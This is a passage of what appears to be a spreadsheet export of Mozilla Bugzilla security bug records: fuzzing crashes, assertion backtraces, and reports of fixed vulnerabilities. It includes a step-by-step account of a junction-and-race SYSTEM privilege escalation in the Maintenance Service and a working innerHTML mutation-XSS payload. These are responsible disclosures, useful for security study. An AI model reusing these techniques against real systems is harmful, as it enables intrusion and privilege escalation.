      <c r="A1295" t="n">
        <v>1116306</v>
      </c>
      <c r="B1295" t="inlineStr">
        <is>
          <t>2014-12-29 15:30:11 -0800</t>
        </is>
      </c>
      <c r="C1295" t="inlineStr">
        <is>
          <t>Assertion failure: [barrier verifier] Unmarked edge: allocation log SavedFrame, at gc/Verifier.cpp</t>
        </is>
      </c>
      <c r="D1295" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:53 -0700</t>
        </is>
      </c>
      <c r="E1295" t="n">
        <v>1</v>
      </c>
      <c r="F1295" t="n">
        <v>1</v>
      </c>
      <c r="G1295" t="n">
        <v>3</v>
      </c>
      <c r="H1295" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1295" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1295" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K1295" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1295" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1295" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1295" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1295" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q1295" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1295" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1295" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T1295" t="n">
        <v>1</v>
      </c>
      <c r="U1295" t="n">
        <v>0</v>
      </c>
      <c r="V1295" t="n">
        <v>19</v>
      </c>
      <c r="W1295" t="inlineStr">
        <is>
          <t>The upcoming testcase asserts js debug shell on m-c changeset 6d5a1e68f248 with --fuzzing-safe --gc-zeal=14 --no-threads --no-baseline --ion-eager at Assertion failure: [barrier verifier] Unmarked edge: allocation log SavedFrame, at gc/Verifier.cpp
The shell was obtained from:
https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2014-12-29-mozilla-central-debug/
in particular:
https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/2014-12-29-mozilla-central-debug/jsshell-mac64.zip
This was found by combining random js tests together with jsfunfuzz, the specific file(s) is/are:
http://hg.mozilla.org/mozilla-central/file/6d5a1e68f248/js/src/jit-test/tests/basic/bug749039.js
http://hg.mozilla.org/mozilla-central/file/6d5a1e68f248/js/src/tests/test262/ch08/8.12/8.12.1/8.12.1-1_8.js
http://hg.mozilla.org/mozilla-central/file/6d5a1e68f248/js/src/jit-test/tests/debug/Memory-drainAllocationsLog-09.js
Setting s-s since this involves gc stuff and the barrier, assuming sec-critical but please feel free to change this as necessary.
Bisection is not reliable - I cannot reproduce on a local testcase, and so I do not have a reliable stack.</t>
        </is>
      </c>
      <c r="X1295" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" t="n">
        <v>850492</v>
      </c>
      <c r="B1296" t="inlineStr">
        <is>
          <t>2013-03-12 16:54:35 -0700</t>
        </is>
      </c>
      <c r="C1296" t="inlineStr">
        <is>
          <t>Arbitrary code execution by Maintenance Service with junctions</t>
        </is>
      </c>
      <c r="D1296" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:11 -0700</t>
        </is>
      </c>
      <c r="E1296" t="n">
        <v>1</v>
      </c>
      <c r="F1296" t="n">
        <v>1</v>
      </c>
      <c r="G1296" t="n">
        <v>3</v>
      </c>
      <c r="H1296" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1296" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1296" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1296" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L1296" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1296" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1296" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1296" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q1296" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1296" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1296" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T1296" t="n">
        <v>1</v>
      </c>
      <c r="U1296" t="n">
        <v>0</v>
      </c>
      <c r="V1296" t="n">
        <v>36</v>
      </c>
      <c r="W1296" t="inlineStr">
        <is>
          <t>Created attachment 724211
Proof-of-concept source + binaries
I was having a bit of a poke around the Mozilla Maintenance Service and believe I've come across a vulnerability that lets unprivileged users execute arbitrary code as the SYSTEM user.
The crux of the problem is that updatehelper.cpp:IsLocalFile() doesn't take into account the existence of junctions (which standard users can create). We can fool the Maintenance Service into thinking the updater.exe is on a local drive, by creating a junction, eg. c:\thumbdrive to a removable drive d:. PathStripToRootW returns c: so the process continues.
This leads to a race condition since we can dismount the drive after the updater.exe has been validated (workmonitor.cpp:403). This kills the write-lock the Maintenance Service has on the updater.exe. Between the validation and when the process is run (workmonitor.cpp:182) we can replace the lockless file with our malicious payload which the Maintenance Service then happily executes as the SYSTEM user.
I've attached a proof-of-concept to this bug. It executes reliably for me on Windows 7 x64, FF 19.0.2. I believe Vista and XP would be vulnerable as well, but haven't confirmed.
To run the proof-of-concept, you will need to have the binaries run_exploit.exe and payload.exe in "C:\exploit", Firefox installed to "C:\Program Files (x86)\Mozilla Firefox", and a removable drive mounted.
run_exploit.exe takes one mandatory parameter - the drive letter of your removable drive (eg. c:\exploit\run_exploit.exe d:). It will create updater.exe and updater.ini on the removable drive, and a c:\thumbdrive junction.
payload.exe can be replaced with your payload of choice. This one just executes system("whoami &gt; /foo.txt"); to verify the process has SYSTEM credentials. It will create foo.txt in the root drive.
Source code for both are contained in the attached zip file.
If you need any more info please let me know.
Seb</t>
        </is>
      </c>
      <c r="X1296" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" t="n">
        <v>1387919</v>
      </c>
      <c r="B1297" t="inlineStr">
        <is>
          <t>2017-08-06 19:30:25 -0700</t>
        </is>
      </c>
      <c r="C1297" t="inlineStr">
        <is>
          <t>"consumed == child-&gt;consumed" assert failed in sec_asn1d_reuse_encoding</t>
        </is>
      </c>
      <c r="D1297" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:50 -0700</t>
        </is>
      </c>
      <c r="E1297" t="n">
        <v>1</v>
      </c>
      <c r="F1297" t="n">
        <v>1</v>
      </c>
      <c r="G1297" t="n">
        <v>3</v>
      </c>
      <c r="H1297" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1297" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1297" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1297" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1297" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1297" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1297" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1297" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main102+]</t>
        </is>
      </c>
      <c r="Q1297" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1297" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1297" t="inlineStr">
        <is>
          <t>3.79</t>
        </is>
      </c>
      <c r="T1297" t="n">
        <v>1</v>
      </c>
      <c r="U1297" t="n">
        <v>0</v>
      </c>
      <c r="V1297" t="n">
        <v>17</v>
      </c>
      <c r="W1297" t="inlineStr">
        <is>
          <t>Created attachment 8894384
crash.asn1
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Build ID: 20170630112252
Steps to reproduce:
Hi,
We found a failed assertion in the last revision of nss (a0a4e05dcdd5) when we try to print a certificate using pp.
To reproduce execute: ./pp -t c -i crash.asn1
Actual results:
It aborts:
Certificate:
Assertion failure: consumed == child-&gt;consumed, at secasn1d.c:1565
Using gdb, we can obtain the backtrace:
Program received signal SIGABRT, Aborted.
0x00007f66a124f8c0 in raise () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007f66a124f8c0 in raise () from /usr/lib/libc.so.6
#1  0x00007f66a1250f72 in abort () from /usr/lib/libc.so.6
#2  0x00007f66a22148b2 in PR_Assert (s=0x7f66a28879ee "consumed == child-&gt;consumed", file=0x7f66a2887480 "secasn1d.c", ln=1565)
    at ../../../../pr/src/io/prlog.c:553
#3  0x00007f66a28741f0 in sec_asn1d_reuse_encoding (state=0x100231908) at secasn1d.c:1565
#4  0x00007f66a287616c in SEC_ASN1DecoderUpdate_Util (cx=0x100231810, buf=0x100230597 "0\200\030", '\060' &lt;repeats 49 times&gt;, "\030\001\060", len=78)
    at secasn1d.c:2804
#5  0x00007f66a287681e in SEC_ASN1Decode_Util (poolp=0x100230dc0, dest=0x100230ef0, theTemplate=0x7f66a1d545e0 &lt;CERT_CertificateTemplate&gt;, 
    buf=0x100230490 "0\200\002\002\200", len=341) at secasn1d.c:3107
#6  0x00007f66a2876880 in SEC_ASN1DecodeItem_Util (poolp=0x100230dc0, dest=0x100230ef0, theTemplate=0x7f66a1d545e0 &lt;CERT_CertificateTemplate&gt;, 
    src=0x1002301c0) at secasn1d.c:3121
#7  0x000000010000cb3a in SECU_PrintCertificate (out=0x7f66a15bd580 &lt;_IO_2_1_stdout_&gt;, der=0x1002301c0, m=0x10001250b "Data", level=1)
    at secutil.c:2384
#8  0x000000010000f205 in secu_PrintSignedDataSigOpt (out=0x7f66a15bd580 &lt;_IO_2_1_stdout_&gt;, der=0x7fffffffdf50, m=0x10001175b "Certificate", level=0, 
    inner=0x10000cab6 &lt;SECU_PrintCertificate&gt;, withSignature=withSignature) at secutil.c:3194
#9  0x000000010000f2e4 in SECU_PrintSignedData (out=0x7f66a15bd580 &lt;_IO_2_1_stdout_&gt;, der=0x7fffffffdf50, m=0x10001175b "Certificate", level=0, 
    inner=0x10000cab6 &lt;SECU_PrintCertificate&gt;) at secutil.c:3212
#10 0x0000000100004b96 in main (argc=5, argv=0x7fffffffe058) at pp.c:150
Expected results:
It shouldn't abort.</t>
        </is>
      </c>
      <c r="X1297" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" t="n">
        <v>430569</v>
      </c>
      <c r="B1298" t="inlineStr">
        <is>
          <t>2008-04-23 15:57:45 -0700</t>
        </is>
      </c>
      <c r="C1298" t="inlineStr">
        <is>
          <t>Crash [@ nsPropertyTable::PropertyList::Equals] with -moz-column, position:fixed</t>
        </is>
      </c>
      <c r="D1298" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E1298" t="n">
        <v>1</v>
      </c>
      <c r="F1298" t="n">
        <v>1</v>
      </c>
      <c r="G1298" t="n">
        <v>3</v>
      </c>
      <c r="H1298" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1298" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1298" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1298" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1298" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1298" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed by bug 363247]</t>
        </is>
      </c>
      <c r="Q1298" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1298" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1298" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1298" t="n">
        <v>1</v>
      </c>
      <c r="U1298" t="n">
        <v>0</v>
      </c>
      <c r="V1298" t="n">
        <v>24</v>
      </c>
      <c r="W1298" t="inlineStr">
        <is>
          <t>Created attachment 317414
testcase (crashes Firefox when closed)
Loading the testcase triggers:
###!!! ASSERTION: reflow roots should never split: 'status == NS_FRAME_COMPLETE', file /Users/jruderman/trunk/mozilla/layout/base/nsPresShell.cpp, line 6296
Closing the window triggers:
Crash [@ nsPropertyTable::PropertyList::Equals] dereferencing 0xddddde09.
Related to bug 399994?</t>
        </is>
      </c>
      <c r="X1298" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" t="n">
        <v>1044077</v>
      </c>
      <c r="B1299" t="inlineStr">
        <is>
          <t>2014-07-25 09:32:12 -0700</t>
        </is>
      </c>
      <c r="C1299" t="inlineStr">
        <is>
          <t>Change jemalloc poison address to something that is not a nop-slide</t>
        </is>
      </c>
      <c r="D1299" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:16 -0700</t>
        </is>
      </c>
      <c r="E1299" t="n">
        <v>1</v>
      </c>
      <c r="F1299" t="n">
        <v>1</v>
      </c>
      <c r="G1299" t="n">
        <v>3</v>
      </c>
      <c r="H1299" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1299" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1299" t="inlineStr">
        <is>
          <t>Memory Allocator</t>
        </is>
      </c>
      <c r="K1299" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1299" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1299" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1299" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1299" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+] (stepping-stone for exploits)</t>
        </is>
      </c>
      <c r="Q1299" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1299" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1299" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1299" t="n">
        <v>1</v>
      </c>
      <c r="U1299" t="n">
        <v>0</v>
      </c>
      <c r="V1299" t="n">
        <v>46</v>
      </c>
      <c r="W1299" t="inlineStr">
        <is>
          <t>In bug 1036779 comment 4, nbp pointed out that the 0x5a5a5a5a poison value actually turns into valid instructions, so if the JIT ends up running over freed memory, it doesn't crash.  Somebody should figure out what kind of value we can use for poisoning that will fail when directly executed.
(I'm marking this s-s for now, but maybe it is obvious to anybody who would be writing an exploit, and so it doesn't need to be hidden.)</t>
        </is>
      </c>
      <c r="X1299" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" t="n">
        <v>5019</v>
      </c>
      <c r="B1300" t="inlineStr">
        <is>
          <t>1999-04-12 18:48:14 -0700</t>
        </is>
      </c>
      <c r="C1300" t="inlineStr">
        <is>
          <t>CCK Wizard is not including selected Install Components.</t>
        </is>
      </c>
      <c r="D1300" t="inlineStr">
        <is>
          <t>2000-01-03 08:06:56 -0800</t>
        </is>
      </c>
      <c r="E1300" t="n">
        <v>1</v>
      </c>
      <c r="F1300" t="n">
        <v>1</v>
      </c>
      <c r="G1300" t="n">
        <v>6</v>
      </c>
      <c r="H1300" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1300" t="inlineStr">
        <is>
          <t>CCK Graveyard</t>
        </is>
      </c>
      <c r="J1300" t="inlineStr">
        <is>
          <t>CCK-Wizard</t>
        </is>
      </c>
      <c r="K1300" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1300" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1300" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N1300" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1300" t="inlineStr"/>
      <c r="Q1300" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1300" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1300" t="inlineStr">
        <is>
          <t>M13</t>
        </is>
      </c>
      <c r="T1300" t="n">
        <v>1</v>
      </c>
      <c r="U1300" t="n">
        <v>0</v>
      </c>
      <c r="V1300" t="n">
        <v>11</v>
      </c>
      <c r="W1300" t="inlineStr">
        <is>
          <t>Latest CCK Wizard Machine
1.Launch CCK Wizard
2.Proceed to the Branding page 3 of 4
3.Enter path to custom .bmp for Account Setup pages
4.Enter Telephone number for Tech Support
5.Enter Company Name for all Account Setup screens
6.Proceed to the "Build Installer(s)" screen, select all the modules in "Install
Components" list box.
7.Select the Build Installers button
8.View the CD\ directory and locate all Install Components' .z and .ini files
(eg. AS.INI and AS.Z for Internet Setup Module)
Results:
The CCK Wizard is not picking up the Install Components' associated .z and .ini
files to be included in the customized build.</t>
        </is>
      </c>
      <c r="X1300" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" t="n">
        <v>535641</v>
      </c>
      <c r="B1301" t="inlineStr">
        <is>
          <t>2009-12-17 12:49:23 -0800</t>
        </is>
      </c>
      <c r="C1301" t="inlineStr">
        <is>
          <t>Assertion failure: (mContext)-&gt;tempValueRooters == (&amp;mTvr)</t>
        </is>
      </c>
      <c r="D1301" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1301" t="n">
        <v>1</v>
      </c>
      <c r="F1301" t="n">
        <v>1</v>
      </c>
      <c r="G1301" t="n">
        <v>6</v>
      </c>
      <c r="H1301" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1301" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1301" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1301" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1301" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1301" t="inlineStr">
        <is>
          <t>[crashkill][crash-automation][sg:critical?][3.6.x]</t>
        </is>
      </c>
      <c r="Q1301" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1301" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1301" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T1301" t="n">
        <v>1</v>
      </c>
      <c r="U1301" t="n">
        <v>0</v>
      </c>
      <c r="V1301" t="n">
        <v>23</v>
      </c>
      <c r="W1301" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7pre) Gecko/20091217 Shiretoko/3.5.7pre (debug)
Steps to reproduce:
-&gt; Load http://n.yam.com/view/mkvideopage.php/20091202455780
--&gt; Crashes after a few seconds on load
also crashes on 1.9.2 but different stack :/
Assertion failure: (mContext)-&gt;tempValueRooters == (&amp;mTvr), at c:\work\mozilla\b
uilds\1.9.1\mozilla\firefox-debug\dist\include\js\jscntxt.h:1071
(3c4.840): Break instruction exception - code 80000003 (!!! second chance !!!)
eax=00000091 ebx=0012edf0 ecx=2c0ba550 edx=10313d38 esi=08aba000 edi=00000000
eip=7c90120e esp=0012ebbc ebp=0012ebc0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
7c90120e cc              int     3
0:000&gt; cdb: Reading initial command '!load winext\msec.dll;.logappend;!exploitab
le;k;q'
Exploitability Classification: UNKNOWN
Recommended Bug Title: Breakpoint starting at ntdll!DbgBreakPoint+0x000000000000
0000 called from gkplugin!JSAutoTempValueRooter::~JSAutoTempValueRooter+0x000000
0000000031 (Hash=0x687e1e27.0x2e7e0429)
While a breakpoint itself is probably not exploitable, it may also be an indicat
ion that an attacker is testing a target. In either case breakpoints should not
exist in production code.
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ebc0 0750b501 ntdll!DbgBreakPoint
0012ebd8 0750aef3 gkplugin!JSAutoTempValueRooter::~JSAutoTempValueRooter+0x31
0012ed4c 08606102 gkplugin!_evaluate+0x4e3
0012ed88 085058e1 NPSWF32!NP_Shutdown+0xcde
0012ede4 085b9774 NPSWF32+0x358e1
0012ee98 08570238 NPSWF32+0xe9774
0012f0c4 085a47d8 NPSWF32+0xa0238
0012f168 0860959a NPSWF32+0xd47d8
0012f23c 1021cb0a NPSWF32!NP_Shutdown+0x4176
0012f24c 1021bb21 MSVCR80D!CrtIsValidHeapPointer+0x15a
0012f268 0045936a MSVCR80D!free_dbg+0x161
0012f27c 004593ba nspr4!_MD_CURRENT_THREAD+0x1a
00d153f8 00000000 nspr4!_MD_CURRENT_THREAD+0x6a
quit:</t>
        </is>
      </c>
      <c r="X1301" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" t="n">
        <v>173005</v>
      </c>
      <c r="B1302" t="inlineStr">
        <is>
          <t>2002-10-07 00:08:28 -0700</t>
        </is>
      </c>
      <c r="C1302" t="inlineStr">
        <is>
          <t>Add bar charts, pie charts etc. to reporting</t>
        </is>
      </c>
      <c r="D1302" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E1302" t="n">
        <v>1</v>
      </c>
      <c r="F1302" t="n">
        <v>1</v>
      </c>
      <c r="G1302" t="n">
        <v>4</v>
      </c>
      <c r="H1302" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1302" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1302" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K1302" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1302" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1302" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1302" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1302" t="inlineStr"/>
      <c r="Q1302" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1302" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1302" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1302" t="n">
        <v>1</v>
      </c>
      <c r="U1302" t="n">
        <v>0</v>
      </c>
      <c r="V1302" t="n">
        <v>28</v>
      </c>
      <c r="W1302" t="inlineStr">
        <is>
          <t>We should use the Template Toolkit interface to GD to allow the generation of
bar charts, pie charts etc. instead of tables for the reports.
Gerv</t>
        </is>
      </c>
      <c r="X1302" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" t="n">
        <v>1602944</v>
      </c>
      <c r="B1303" t="inlineStr">
        <is>
          <t>2019-12-10 14:01:52 -0800</t>
        </is>
      </c>
      <c r="C1303" t="inlineStr">
        <is>
          <t>Possible Mutation XSS or DOM XSS in innerHTML method due to incorrect parsing &lt;template&gt;</t>
        </is>
      </c>
      <c r="D1303" t="inlineStr">
        <is>
          <t>2024-05-30 10:05:21 -0700</t>
        </is>
      </c>
      <c r="E1303" t="n">
        <v>1</v>
      </c>
      <c r="F1303" t="n">
        <v>1</v>
      </c>
      <c r="G1303" t="n">
        <v>3</v>
      </c>
      <c r="H1303" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1303" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1303" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1303" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1303" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1303" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1303" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1303" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1303" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?][post-critsmash-triage][adv-main73+] [adv-esr68.5+]</t>
        </is>
      </c>
      <c r="Q1303" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1303" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1303" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T1303" t="n">
        <v>1</v>
      </c>
      <c r="U1303" t="n">
        <v>0</v>
      </c>
      <c r="V1303" t="n">
        <v>26</v>
      </c>
      <c r="W1303" t="inlineStr">
        <is>
          <t>Description
===
When doing some fuzzing, I discovered that it is possible to execute scripts inside &lt;select&gt; element when using innerHTML method. The bug is that the parsing gets broken after injecting &lt;template&gt; element.
Generally, no scripts should be executed inside &lt;select&gt; element, and the only allowed tags seem to be &lt;option&gt;, &lt;optgroup&gt;, &lt;script&gt;, &lt;template&gt;. None of these can execute javascript when called through innerHTML, and the bug seems to be only working in the Firefox within browsers that I tested this on.
Steps
===
Reproduction steps (Firefox Browser 71.0 (64-bit), Windows 10):
var s = document.createElement('select');
document.body.appendChild(s);
s.innerHTML = '&lt;svg/onload=alert(/wont_trigger/)&gt;&lt;/svg&gt;&lt;template&gt;&lt;/template&gt;&lt;svg/onload=alert(/will_trigger/)&gt;&lt;/svg&gt;'
I also discovered that the issue is very innerHTML specific and will not work when the element is inserted directly through insertAdjacentHTML, document.write() or
&lt;select&gt;&lt;template&gt;&lt;/template&gt;&lt;svg onload=alert()&gt;&lt;/svg&gt;&lt;/select&gt; as a HTML code.
Impact
===
I don't know what's the biggest impact yet, but I fell that there must a serious bug in the parser that allows inserting any HTML after &lt;template&gt;&lt;/template&gt; when using innerHTML, even if the element could not be put there otherwise.</t>
        </is>
      </c>
      <c r="X1303" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" t="n">
        <v>1092363</v>
      </c>
      <c r="B1304" t="inlineStr">
        <is>
          <t>2014-10-31 14:17:31 -0700</t>
        </is>
      </c>
      <c r="C1304" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsTransformedTextRun::SetCapitalization</t>
        </is>
      </c>
      <c r="D1304" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:05 -0700</t>
        </is>
      </c>
      <c r="E1304" t="n">
        <v>1</v>
      </c>
      <c r="F1304" t="n">
        <v>1</v>
      </c>
      <c r="G1304" t="n">
        <v>3</v>
      </c>
      <c r="H1304" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1304" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1304" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K1304" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1304" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1304" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1304" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1304" t="inlineStr">
        <is>
          <t>[asan][adv-main36+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q1304" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1304" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1304" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T1304" t="n">
        <v>1</v>
      </c>
      <c r="U1304" t="n">
        <v>0</v>
      </c>
      <c r="V1304" t="n">
        <v>46</v>
      </c>
      <c r="W1304" t="inlineStr">
        <is>
          <t>Created attachment 8515263
repro-file.html
Tested on:
OS: Ubuntu 14.04
